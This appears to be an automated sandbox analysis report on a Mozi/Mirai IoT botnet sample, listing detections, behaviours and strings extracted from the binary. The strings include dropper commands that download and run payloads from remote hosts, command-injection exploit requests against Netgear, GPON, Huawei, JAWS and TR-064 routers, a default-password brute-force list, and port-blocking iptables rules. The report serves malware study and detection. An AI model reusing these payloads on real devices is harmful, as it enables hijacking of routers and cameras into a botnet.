Analysis Report Mozi.m

Overview

General Information

Sample Name: Mozi.m
Analysis ID: 294799
MD5: eec5c6c219535fba3a0492ea8118b397
SHA1: 292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256: 12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score: 100
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Mirai
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "grep" command used to find patterns in files or piped streams
Executes the "iptables" command used for managing IP filtering and manipulation
Executes the "mkdir" command used to create folders
Executes the "mktemp" command used to create a temporary unique file name
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Mozi.m Avira: detected
Antivirus detection for dropped file
Source: /usr/networks Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: Mozi.m Virustotal: Detection: 70%
Source: Mozi.m ReversingLabs: Detection: 62%

Spreading:

Found strings indicative of a multi-platform dropper
Source: Mozi.m String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m (PID: 3515) Opens: /proc/net/route

Networking:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 3690) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Sample listens on a socket
Source: /tmp/Mozi.m (PID: 3515) Socket: 0.0.0.0::51746
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.m String found in binary or memory: http://127.0.0.1
Source: Mozi.m String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m String found in binary or memory: http://HTTP/1.1
Source: Mozi.m String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.66.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: Mozi.m String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.66.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.66.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

Writes HTML files containing JavaScript to disk
Source: /tmp/Mozi.m (PID: 3492) HTML file containing JavaScript created: /usr/networks

System Summary:

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample Potential command found: killall -9 %s
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.b HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.4 HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.k HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.l HTTP/1.0
Source: Initial sample Potential command found: GET /Mozi.p HTTP/1.0
Source: Initial sample Potential command found: GET /%s HTTP/1.1
Source: Initial sample Potential command found: POST /%s HTTP/1.1
Source: Initial sample Potential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
Source: Initial sample Potential command found: POST /picsdesc.xml HTTP/1.1
Source: Initial sample Potential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: Initial sample Potential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: Initial sample Potential command found: POST /UD/act?1 HTTP/1.1
Source: Initial sample Potential command found: POST /HNAP1/ HTTP/1.0
Source: Initial sample Potential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
Source: Initial sample Potential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
Source: Initial sample Potential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Source: Initial sample Potential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
Source: Initial sample Potential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
Sample has stripped symbol table
Source: ELF static info symbol of initial sample .symtab present: no
Yara signature match
Source: Mozi.m, type: SAMPLE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
